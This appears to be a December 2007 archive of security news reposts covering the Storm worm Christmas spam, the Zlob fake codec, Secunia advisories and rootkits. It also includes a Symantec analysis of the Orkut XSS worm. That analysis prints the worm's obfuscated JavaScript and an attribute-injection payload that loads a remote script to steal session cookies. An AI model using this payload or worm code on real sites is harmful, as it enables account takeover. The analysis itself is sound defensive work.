December 2007 - Posts

 

Is that really you, Santa?

Look, here comes Santa...on his sleigh with Rudolph the red-nosed reindeer and a computer. This year, he seems to have decided to distribute free gifts through email...but with a catch.

An email that contains a link to a malicious file reportedly arrives as the following:
Subject: Seasons Greetings
Message Body:

listen up,

This Christmas, we want to show you something you will really enjoy.
This might not be fun for the whole family, but I bet you'll like it come one take 2 min and check it out.
hxxp://merrychrist[REMOVED]

If you click on the links, you will find pictures of women dressed as "Mrs. Clause" on the site and the malicious file stripshow.exe, which is a new variant of Trojan.Peacomm.D,
will be downloaded if you click on the picture.

View Mrs-Clause.gif

Once it runs, you will be rewarded with malicious gifts for free!! As we have warned in the past, users are taking serious risks when being enticed by free stuff available on the Internet. Always keep your antivirus software up-to-date and follow safe computing practices.

Happy holidays!!

Posted by Shunichi Imano on December 23, 2007 08:48 PM

Source: Symantec Security Response Weblog: Is that really you, Santa?

 

It's a Stormy Christmas Eve..
Posted by Esz @ 08:54 GMT |


So, we were wrong. It turns out that the Storm gang was going to do a Christmas Malware run after all, they just decided to start it surprisingly late - on Christmas eve itself!
There's been a series of spam messages redirecting traffic to malicious site merrychristmasdude.com. This site contains a new version of the Storm Worm. The IP address of the site changes every second. We also already detect it earlier as Email-Worm.Win32.Zhelatin.pd
Here are the Screen shots of the site:
stormxmas (133k image)
stormxmas2 (5k image)
Don't be naughty and go wondering to that domain. Please do not click on the "Download For Free Now" button as it will get you infected. Merry Christmas, y'all!

Source: It's a Stormy Christmas Eve.. - F-Secure Weblog : News from the Lab

 

Anticipated Storm-Bot Attack Begins

Published: 2007-12-24,
Last Updated: 2007-12-24 13:11:38 UTC
by Kevin Liston (Version: 3)

Overview and Blocking Information

Shortly after 0000 GMT 24-DEC-2007 reports came in indicating that the Storm Botnet was sending out another wave of attempts to enlist new members.  This version is a Christmas-themed stripshow directing victims to merrychristmasdude.com.

The message comes in with a number of subjects:

Subject: I love this Carol!
Subject: Santa Said, HO HO HO
Subject: Christmas Email
Subject: The Perfect Christmas
Subject: Find Some Christmas Tail
Subject: Time for a little Christmas Cheer

Updated subjects:
“Merry Christmas To All”
“Warm Up this Christmas”
“Mrs. Clause Is Out Tonight!”
“The Twelve Girls Of Christmas”
“Jingle Bells, Jingle Bells”
“Cold Winter Nights”

The body is something similar to:

do you have a min?



This Christmas, we want to show you something you will really enjoy. Forget all the stress for two min and feast your eyes on these. ;-)

http://merry christmasdude.com/

[the domain was interrupted for your protection]

Thanks Kevin for the initial report.

I recommend that you apply blocks on that domain (merrychristmasdude.com) for both outbound HTTP requests and incoming emails.

Under The Hood

The domain appears to be registered through nic.ru and hosted on a fast-flux network of at least 1000 nodes.  Like previous Storm waves, the binary changes approximately every 15 minutes; supposedly updating the peer-list used by the P2P network that the bot-net uses for command and control.

Russ has a nice and tidy analysis available at: http://holisticinfosec.blogspot.com/2007/12/storm-bot-stripshow-analysis.html

Speaking of Blogspot

If you google for merrychristmasdude.com you'll see a number of spam blogs set up with that domain in their body and directing traffic to siski.cn (take a look for that in your proxy logs while you're at it.)

Visiting skiski.cn will redirect you over to shockbabetv.com and attempt to install a fake video codec, which itself appears to be a downloader to deliver more coal to your stocking.


Kevin Liston (kliston -at- isc.sans.org)

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

 

MS07-069 - Post install issue

Published: 2007-12-19,
Last Updated: 2007-12-21 05:09:23 UTC
by Stephen Hall (Version: 2)

We have been working with Microsoft and a couple of our readers on an issue they have been having with MS07-069 and IE crashing after the roll up patch for IE has been installed.

Well the Microsoft MSRC have updated their blog and there is a KB article which provides a workaround.

So if you have a customised installation and have been having IE issues since MS07-069, this could be your solution.

UPDATE

Microsoft has released an update to fix this problem.  You can find it here. (thanks Susan).

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

 

Google Toolbar Custom Button Installer Dialog Spoofing Weakness
Advisory Available in Danish Advisory Available in German

Secunia Advisory:
SA28166

Release Date:
2007-12-21

Critical:

Less critical

Impact:
Spoofing

Where:
From remote

Solution Status:
Unpatched

Software:
Google Toolbar 1.x
Google Toolbar 2.x
Google Toolbar 3.x
Google Toolbar 4.x

 

Description:
Aviv Raffon has discovered a weakness in Google Toolbar, which can be exploited by malicious people to conduct spoofing attacks.

The weakness is caused due to an error when handling domains that are being displayed in the Custom Button Installer dialog. This can be exploited to spoof the origin of a custom button and the domain information in the "privacy considerations" section via a specially crafted xml file in combination with a redirector page.

The weakness is confirmed in Google Toolbar version 4.0.1601.4987 for Internet Explorer. Other versions may also be affected.

Solution:
Do not rely on information in the Custom Button dialog when installing custom buttons.

Provided and/or discovered by:
Aviv Raffon

Original Advisory:
http://aviv.raffon.net/2007/12/18/GoogleToolbarDialogSpoofingVulnerability.aspx

Source: Google Toolbar Custom Button Installer Dialog Spoofing Weakness - Advisories - Secunia

 

Comcast starts blocking email willy-nilly

Spam voting

A NEW feature on Comcast which blocks email identified as spam has been causing merry hell.

In the good old days if two people decide that an email from an outfit is spam, that email will go into the junk mailbox if it appears anywhere else.

Writing in his bog, one angry customer said that recently Comcast has upped the ante and will block all email from the offending server.

The punter works for a news site and says that Comcast users that have requested daily news emails from the site and are being denied email they have asked for.

He had tried to get Comcast to look at the problem, but the outfit did not seem particularly interested. Loyal readers of the news site who have complained that their news is not being delivered have also complained and been ritualistically ignored.

After much shouting Comcast has lifted the block on the IP range. But this seems to be a problem with several US ISPs. For example, one ISP in Florida and another in California are convinced that every email from Bulgaria must be spam and is refusing to receive mail with a .bg ending.

Ironically the same mail sent from yahoo.com gets through. µ

Source: Comcast starts blocking email willy-nilly - The INQUIRER

 

Is Trojan.Zlob Getting Honest? Naaahh...

New fake codec Web sites often appear out of nowhere (we are pretty used to seeing them) and in most cases if you download and run the "codec" you get infected with a variant of Trojan.Zlob. Nothing new, but this time I found something different. I was testing a fake codec Web site when I came upon a new variant. The installation step is the usual:


Figure 1: Standard installation process

However, after that the browser is started with a Google search for the word “sex.” The interesting stuff is that while browsing, you will now be frequently faced with this popup:


Figure 2: Frequently recurring message box

Well, I really appreciate the honesty of Zlob telling me I was infected! Clicking the OK button will force the download of “IE Defender,” which is an antispyware application. (IE Defender is also a potentially unwanted application. It is a wannabe malware scanner that is used in conjunction with the Zlob threat. You can find more details about IE Defender in the related write-up here.)

Of course, it’s not over yet. The Zlob also installs a browser helper object (BHO – a module for Internet Explorer, used to integrate added functionality) in order to show the previously mentioned popup during Web browsing. A quick analysis of the BHO revealed some other interesting features. It is capable of hijacking Google results and redirecting them to IE Defender Web site:


Figure 3: Google search reports a fake error box and a link to pornographic content

A fake error box is shown in the Google results, as well as a link to a pornographic video on YouTube. This is supposed to panic the user, because most users wouldn't want someone else using his or her computer for an innocent Google search and then find a link to pornographic content in the search results. (Incidentally, you might notice that the search word I used was "potato.”) Clicking the error box will bring the user to the IE Defender Web site.

If the annoying popup was not enough, surely an error message from Google will make you think twice about the potential dangers! We know very well how these threats can spoof legitimate Web sites or security products in order to convince a user to buy their own security applications. Google is not the only one being targeted. Further analysis reveals that Yahoo is also supposedly reporting the same behavior:


Figure 4: Yahoo search shows a fake error box

Not only do you see a fake error box in the search results, but also the first legitimate result is hijacked so that if it is clicked it will redirect the user to the IE Defender fake online scan Web site. Also, Live Search is not immune:


Figure 5: A legitimate search result in Live Search has been redirected

In this case there are no fake error boxes shown in the search results, but the first legitimate result entry is hijacked in order to point to the IE Defender Web site. In addition, the MySpace and MSN Web sites are targeted with the same technique.

Interestingly, if you decide to download IE Defender and run a scan, it will actually detect the Zlob infection. Of course you have to pay if you want to clean up the reported infection. So it looks like that Zlob is really kind: after infecting your system it will reveal that your system is infected. Then it tries to redirect you to a Web site where you can download antispyware software that is supposedly able to remove it (for only $38.95 USD). What a lovely Trojan! I didn't actually purchase the IE Defender software, because it would probably do more harm than good. I'd rather let my Symantec products (with the latest definitions, of course) take care of the antispyware work!

Posted by Andrea Lelli on December 21, 2007 05:00 AM

Source: Symantec Security Response Weblog: Is Trojan.Zlob Getting Honest? Naaahh...

 

Secunia Advisory:
SA28177

Release Date:
2007-12-20

Critical:

Less critical

Impact:
Manipulation of data

Where:
From remote

Solution Status:
Unpatched

Software:
HP Software Update 3.x

Description:
porkythepig has reported a vulnerability in HP Software Update, which can be exploited by malicious people to overwrite arbitrary files on a user's system.
The vulnerability is caused due to the HPRulesEngine.ContentCollection.1 ActiveX Control (RulesEngine.dll) including the insecure "SaveToFile()" method, which writes to a file specified as an argument. This can be exploited to overwrite and corrupt arbitrary files on the system in the context of the currently logged-on user.
The vulnerability is reported in version 3.0.8.4. Other versions may also be affected.
Solution:
Set the kill-bit for the affected ActiveX control.
Provided and/or discovered by:
porkythepig
Original Advisory:
http://www.anspi.pl/~porkythepig/hp-issue/wyfukanyszynszyl.txt

Source: HP Software Update ContentCollection Class ActiveX Control Insecure Method - Advisories - Secunia

********************************************************************

Title: Microsoft Security Bulletin Minor Revision

Issued: December 20, 2007

********************************************************************

Summary

=======

The following bulletin has undergone a minor revision increment.

Please see the appropriate bulletin for more details.

* MS07-069 - Critical

Bulletin Information:

=====================

* MS07-069 - Critical

- http://www.microsoft.com/technet/security/bulletin/ms07-069.mspx

- Reason for Revision: Bulletin revised to reflect a new Security Update FAQ entry for a known issue documented in KB946627.

- Originally posted: December 11, 2007

- Updated: December 20, 2007

- Bulletin Severity Rating: Critical

- Version: 1.3

 

Rootkits in China Part 1

Thursday December 20, 2007 at 9:52 am CST
Posted by Xing Su

Trackback

The term “rootkit” was originally used to refer to toolkits used by root privileged users. This definition has evolved over time. Nowadays, the term rootkit refers to backdoor programs that run with elevated privileges and that are designed to evade detection by users, administrators and rootkit detection software. Rootkits first appeared in China in 2001 and have evolved substantially since then.

These days most rootkits are installed through exploitation of web browser vulnerabilities or from the infection of viruses and worms. In some cases, rootkits are bundled with images that exploit image library flaws to gain access to systems. In other cases, exploits for previously unknown vulnerabilities (zero-day) are placed on web sites and used to hack browsers and install rootkits. For example, exploits for the zero-day vulnerability identified by CVE-2007-0038 were found on many Chinese websites several months before a patch was released. In other cases, popular websites and public forums are hacked. Their content is then modified to include exploits that install rootkits on to user systems. Often, attackers exploit script injection vulnerabilities to gain access to these web sites. They then upload exploits for known issues like MS06-001, MS06-014, MS06-055, MS07-017, Baofeng ActiveX vulnerability, RealPlayer ActiveX vulnerability and so on. In China, many rootkits also spread via malware that targets a popular IM client named QQ. Once a QQ user’s machine has been compromised by a rootkit, it will send messages containing links to malicious websites to all of the friends of the affected QQ user. If these users click the links, they too will be targeted. This method of propagation is widespread and difficult to defend against. Another technique used to spread rootkits includes the addition of malicious programs to pirated software like Windows, Photoshop, Office, etc. People who download and install these pirated programs are infected by the rootkits bundled with them. Since pirated software is popular in China, many machines are infected this way.

Stay tuned for Part 2…..

References:

Rootkit Paper 1
Rootkit Paper 2

Source: Computer Security Research - McAfee Avert Labs Blog

 

Pinch Malware Authors Busted
Posted by Alexey @ 16:30 GMT |


Nikolay Patrushev, head of the Russian FSB (Federal Security Agency), recently announced that over 1.4 million hacker attacks against federal sites were repelled in just 2007.
Patrushev also stated that the authors of the famous Pinch trojan (known as LdPinch, PdPinch) have been identified and are now awaiting trial. Pinch production has been done in a very professional manner with the authors creating easy-to-use tools to quickly get stolen information from infected computers.
The two malware authors are reported to be Russian citizens Ermishkin and Farhutdinov. According to some reports, Pinch-based malware has infected tens of millions of personal computers worldwide. The financial losses due to Pinch infections can hardly be calculated.

Pinch Parser

See Patrik's earlier post for more details on some of the tools used.

Source: Pinch Malware Authors Busted - F-Secure Weblog : News from the Lab

 

The Orkut Worm Has Landed!

Orkut is a popular social networking site with millions of registered users. A couple of days ago Orkut was hit with a worm that impacted close to 700,000 users in approximately 24 hours. We took a closer look at the exploit to get an idea of why so many users' systems were infected. The exploit was contained in a JavaScript file, aptly named "virus.js" file, which was injected using an embed tag. Here is a snippet of the JavaScript file:

function $(p,a,c,k,e,d) {
 e=function(c) {
  return(c35?String.fromCharCode(c+29):c.toString(36))
};
if(!''.replace(/^/,String)){
 while(c--){d[e(c)]=kCoffee||e(c)}
 k=[function(e){return dEmail}];
 e=function(){return'\\w+'};
 c=1
};
while(c--){
 if(kCoffee){
  p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),kCoffee)
 }
 }
return p
};
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];
7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?";
m="+m.2f():"")+(c?";
c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);
6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?";
9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);
3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));
f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&
15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);
3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};

We can see from the above code that the JavaScript is heavily obfuscated. After decoding and analyzing the strings in the script we confirmed that it is indeed targeting Orkut users. Our analysis of the decoded JavaScript showed that when the virus.js script is executed it forces the user to join a community called “Infectados pelo Vírus do Orkut”. The name of this community is in Portuguese and translates to “Infected by Virus Orkut.”

This is a novel way for the author of the worm to keep track of accounts infected by the worm. The script then loads the "friends list" of the infected Orkut account and sends them a malicious scrap. The worm uses Orkut scrap entries as its vector of propagation. Below is an example of the code to define the Orkut scrap:

2008 vem ai… que ele comece mto bem par avc
<br/>
[silver]RL Wed Dec 19 14:57:48 UTC+0530 2007[/silver]
<br/>
<embed src=http://www.orkut.com/LoL.aspx type=
“application/x-shockwave-flash” wmode=”transparent’);
Script=document.createElement(‘script’);
Script.src=’http://files.myopera111.com/[REMOVED].js’;
Document.getElementByTagname(‘head’)[0].appendChild
(script);escape(‘” width=”1” height=”1”>
</embed>

When you look at the code there are a few attributes for the embed tag, such as wmode, width, height, etc. The embed tag expects these attributes in order to create a flash object to display the flash content. Now when you look closely at the code, notice the wmode attribute:

wmode=”transparent’);

The author has closed wmode with ‘); and has added some script code in the attribute value itself. Let’s analyze this further. We tested the script with a variant of the malicious scrap:

“<embed src="http://www.orkut.com/LoL.aspx" type="application/x-shockwave-flash" wmode="transparent” width=”1” height=”1”>”.

When Orkut parsed this scrapbook entry, we found it behaved in a similar way to the following code in an Orkut page:

<script type="text/javascript">
var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx',
   '337533968', '1', '1', '9', '#FFFFFF',
   'autohigh', '', '', '337533968');
flashWriter._addParam('wmode', 'transparent');
flashWriter._addParam('allowNetworking', 'internal');
flashWriter._addParam('allowScriptAccess', 'never');
flashWriter._setAttribute('style', '');
flashWriter._write('flashDiv337533968');</script>

The Orkut application parsed the scrap text and created the flash object with values specified in the scrap.
If we look at the source code of the malicious scrap it looks like the below sample (the injected code is marked in bold and red). Note the escape function is added to allow the malicious code to be integrated:

flashWriter._addParam ( 'wmode', 'transparent');
script = document.createElement ( 'script');
script.src = 'http://files.myopera.com/virusd[REMOVED]';
document.getElementsByTagName ( 'head') [0]. AppendChild script);
escape ('');
flashWriter._addParam ( 'allowNetworking', 'internal');
flashWriter._addParam ( 'allowScriptAccess',' never ');

Based on what we seen so far we can infer that the Orkut application filters failed to parse this attribute in the request. It took the whole wmode value as is and added it in the rendering code:

flashWriter._addParam('wmode', 'transparent'); (malicious script)

In this way the worm inserts a malicious script using the embed tag and uses it for exploitation. Interestingly, a victim doesn’t need to click on the scrap. When the scrapbook is loaded the malicious embed flash code loads the virus.js file silently. The JavaScript takes the cookies and tokens of the logged in user and uses it to spread the worm further.

This worm illustrates how a simple script injection exploit could affect a large social networking site. Remember, users didn’t have to click anything as the malicious script runs silently as soon as the page is loaded. This worm could have been used for other malicious purposes, such as stealing cookies, exploiting other vulnerabilities, or stealing sensitive data as well.

As of today, the virus.js script is no longer available on the site and it seems as if there have been adequate checks implemented by Orkut to validate content when posting a scrap. The malicious scraps have also been deleted from the scrapbook of the infected users.

Symantec has built a number of excellent Web browsing protections into our 2008 product range.
The worm is detected by Symantec's antivirus products with certified definitions of 12/19/2007 rev. 7 and greater as JS.Woorkut. We recommend that you keep your Symantec products up-to-date, patch your systems, and run your browser with limited options enabled.

Posted by Umesh Wanve on December 20, 2007 08:30 AM

Source: Symantec Security Response Weblog: The Orkut Worm Has Landed!

 

The darker side of online virus scanners

Aleks
December 20, 2007 | 15:47  GMT

comment

Online antivirus services such as VirusTotal (www.virustotal.com) and VirusScan (http://virusscan.jotti.org) have been around for a few years now. Services like this mean that any user can scan a suspicious file for malicious code online. These services differ from the online scanners offered on antivirus vendor sites by scanning files with several antivirus products simultaneously. For instance, VirusTotal currently uses 32 antivirus products to check suspicious files!

But as so often happens, something that can be used for good – helping users check the integrity of their files – can also be used by virus writers. They quickly caught on to the fact that services like the ones mentioned above could be used to test how well their creations can evade popular antivirus solutions. If a new Trojan or worm can be detected by an antivirus, the author will deliberately modify it until it isn't detected any more. The result? The heuristics used in the vast majority of antivirus products are helpless when confronted by such carefully prepared malicious programs.

By default, VirusScan, VirusTotal and other services send all suspicious files to antivirus companies. If a file is detected by, say, 10 antivirus products, and the other 22 don't detect it, the file will be sent to the 22 relevant virus labs for analysis and to be added to the antivirus database. This significantly reduces the time taken by antivirus companies to react during epidemics and also increases the overall detection rate. If the user doesn't want a file to be sent to the antivirus company, then s/he has to disable this option when scanning the file.

However, there's a rumour in virus writing circles that all files are sent to virus labs, regardless of whether or not the option is enabled. Cyber criminals are now offering a solution for the tin-foil hat brigade – similar services designed expressly for virus writers. You have to pay to use the service, but there's a guarantee that no file will be sent to an antivirus company.

One example is AvCheck.ru. The creators of this site offer to scan files using 15 antivirus programs and 'guarantee privacy for you and your files'. Of course they want money for it – a dollar per file.


We can only admire the entrepreneurial spirit behind this site. But we're not going to wish them success. And after all, the site could be closed at any moment, and a court case could be raised against the creators of the site by the antivirus companies whose products are being used in clear violation of license agreements.

Source: Viruslist.com - Analyst's Diary

 

Cisco Firewall Services Module Denial of Service Vulnerability
Advisory Available in Danish Advisory Available in German

Secunia Advisory:
SA28175

Release Date:
2007-12-20

Critical:

Moderately critical

Impact:
DoS

Where:
From remote

Solution Status:
Vendor Workaround

Software:
Cisco Firewall Services Module (FWSM) 3.x

CVE reference:
CVE-2007-5584 (Secunia mirror)

Description:
A vulnerability has been reported in the Cisco Firewall Services Module (FWSM), which can be exploited by malicious people to cause a DoS (Denial of Service).

The vulnerability is caused due to an unspecified error in the processing of data in the control-plane path with Layer 7 Application Inspections. This can be exploited to cause a crash and reload the FWSM via specially crafted network traffic.

The vulnerability is reported in FWSM System Software version 3.2(3).

Solution:
Update to FWSM software version 3.2(4) (available approximately 2007-12-31).

Apply vendor workaround (see vendor advisory for details).

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://www.cisco.com/warp/public/707/cisco-sa-20071219-fwsm.shtml

Source: Cisco Firewall Services Module Denial of Service Vulnerability - Advisories - Secunia

 

Orkut XSS Worm

Published: 2007-12-19,
Last Updated: 2007-12-19 17:57:39 UTC
by Tom Liston (Version: 1)

A vulnerability in the social networking site Orkut that allowed users to inject HTML and JavaScript into their profiles set the stage for a persistent XSS worm that appears to have affected approximately 400,000 Orkut users.  The malicious code is apparently fetched from the site "http://files.myopera.com" and is called, conveniently enough, "virus.js."

1 comment(s)

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

More Posts Next page »